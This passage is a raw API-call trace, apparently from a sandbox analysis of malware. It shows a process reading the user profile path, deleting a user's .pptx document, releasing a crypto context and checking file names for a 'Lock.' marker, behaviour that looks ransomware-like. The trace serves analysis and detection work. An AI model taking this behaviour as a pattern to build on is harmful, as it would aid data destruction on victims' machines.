wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0215.422] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0215.422] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0215.422] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0215.422] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.422] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.422] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.422] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0215.422] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.422] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0215.422] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.422] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.423] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0215.423] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.423] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0215.423] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.423] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.423] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.423] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.423] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.423] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0215.423] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.423] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0215.423] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0215.423] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.423] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.423] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.423] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.423] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.423] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.423] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0215.423] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.424] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0215.424] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.424] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.424] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0215.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7200, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0215.425] CryptReleaseContext (hProv=0xa7bf78, dwFlags=0x0) returned 1 [0215.425] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.425] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.425] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.425] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.425] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.425] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.425] FreeLibrary (hLibModule=0x76390000) returned 1 [0215.425] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.425] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.425] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.425] CloseHandle (hObject=0x504) returned 1 [0215.426] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.426] CloseHandle (hObject=0x510) returned 1 [0215.428] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.428] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.428] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0215.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0215.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0215.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae40 [0215.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab098 [0215.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0215.428] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0215.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0215.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0215.428] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/cyaer-G0v.pptx", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\cyaer-G0v.pptx", lpFilePart=0x8cedf4*="cyaer-G0v.pptx") returned 0x28 [0215.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5f6c0 | out: hHeap=0x2af0000) returned 1 [0215.428] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\cyaer-G0v.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\cyaer-g0v.pptx")) returned 0x20 [0215.428] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\cyaer-G0v.pptx", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28aaa940, ftCreationTime.dwHighDateTime=0x1d586ea, ftLastAccessTime.dwLowDateTime=0x996d7d10, ftLastAccessTime.dwHighDateTime=0x1d563a9, ftLastWriteTime.dwLowDateTime=0x996d7d10, ftLastWriteTime.dwHighDateTime=0x1d563a9, nFileSizeHigh=0x0, nFileSizeLow=0x285b, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="cyaer-G0v.pptx", cAlternateFileName="CYAER-~1.PPT")) returned 0x9e2138 [0215.428] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\cyaer-G0v.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\cyaer-g0v.pptx")) returned 1 [0215.432] FindNextFileW (in: hFindFile=0x9e2138, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28aaa940, ftCreationTime.dwHighDateTime=0x1d586ea, ftLastAccessTime.dwLowDateTime=0x996d7d10, ftLastAccessTime.dwHighDateTime=0x1d563a9, ftLastWriteTime.dwLowDateTime=0x996d7d10, ftLastWriteTime.dwHighDateTime=0x1d563a9, nFileSizeHigh=0x0, nFileSizeLow=0x285b, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="cyaer-G0v.pptx", cAlternateFileName="CYAER-~1.PPT")) returned 0 [0215.432] FindClose (in: hFindFile=0x9e2138 | out: hFindFile=0x9e2138) returned 1 [0215.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854bf0 | out: hHeap=0x2af0000) returned 1 [0215.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0215.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0215.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0215.433] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0215.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0215.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0215.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0215.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0215.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0215.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0215.433] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0215.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0215.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0215.433] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0215.433] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0215.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaea0 [0215.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0215.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0215.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae40 [0215.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0215.434] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0215.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0215.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0215.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0215.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0215.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0215.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0215.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0215.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0215.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0215.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0215.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0215.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0215.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0215.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0215.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854038 [0215.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0215.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0215.434] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0215.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0215.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0215.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0215.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0215.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0215.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0215.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0215.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0215.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0215.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0215.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0215.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0215.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0215.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0215.435] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x52) returned 0x2a5fc00 [0215.435] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/cyaer-G0v.pptx", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\cyaer-G0v.pptx", lpFilePart=0x8cf650*="cyaer-G0v.pptx") returned 0x28 [0215.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5fc00 | out: hHeap=0x2af0000) returned 1 [0215.435] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\cyaer-G0v.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\cyaer-g0v.pptx")) returned 0xffffffff [0215.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854038 | out: hHeap=0x2af0000) returned 1 [0215.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0215.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0215.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0215.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0215.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0215.436] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0215.436] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.436] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0215.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0215.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0215.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0215.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0215.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0215.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0215.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0215.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0215.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0215.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0215.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Database1.accdb", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="atabase1.accdb", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tabase1.accdb", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="abase1.accdb", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="base1.accdb", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ase1.accdb", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="se1.accdb", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e1.accdb", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1.accdb", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".accdb", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="accdb", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0215.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0215.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0215.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0215.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0215.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0215.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0215.437] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0215.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0215.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0215.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0215.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0215.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0215.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0215.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0215.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0215.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0215.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0215.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0215.437] RtlAllocateHeap (HeapHandle=0x2af0000, 